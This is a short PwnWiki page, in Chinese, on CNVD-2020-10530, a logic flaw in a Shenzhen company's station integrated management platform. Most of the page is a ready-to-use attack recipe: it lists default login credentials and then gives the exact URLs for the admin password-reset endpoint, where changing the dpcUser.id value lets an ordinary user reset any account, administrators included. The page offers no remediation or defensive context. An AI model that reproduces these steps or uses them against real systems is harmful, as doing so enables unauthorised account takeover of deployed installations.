CNVD-2020-10530 深圳市科皓信息技術有限公司 測站綜合管理平台 邏輯缺陷漏洞

From PwnWiki
Other languages:
Chinese

前提條件

該漏洞需要普通用戶身份登錄平台,登錄平台後可以以普通用戶的權限重置所有用戶(包括管理員)的密碼。 

https://<target>/dpc/

默認用戶信息

cs
cs123456


重置Admin密碼

https://<target>/dpc/dpcUser!preEdit.action?dpcUser.id=1

修改dpcUser.id參數的值可以編輯任意用戶,其中可以對任意用戶進行重置密碼,如: 

https://<target>/dpc/dpcUser!preEdit.action?dpcUser.id=2

https://<target>/dpc/dpcUser!preEdit.action?dpcUser.id=3
Retrieved from "https://pwnwiki.com/index.php?title=CNVD-2020-10530_深圳市科皓信息技術有限公司_測站綜合管理平台_邏輯缺陷漏洞&oldid=6573"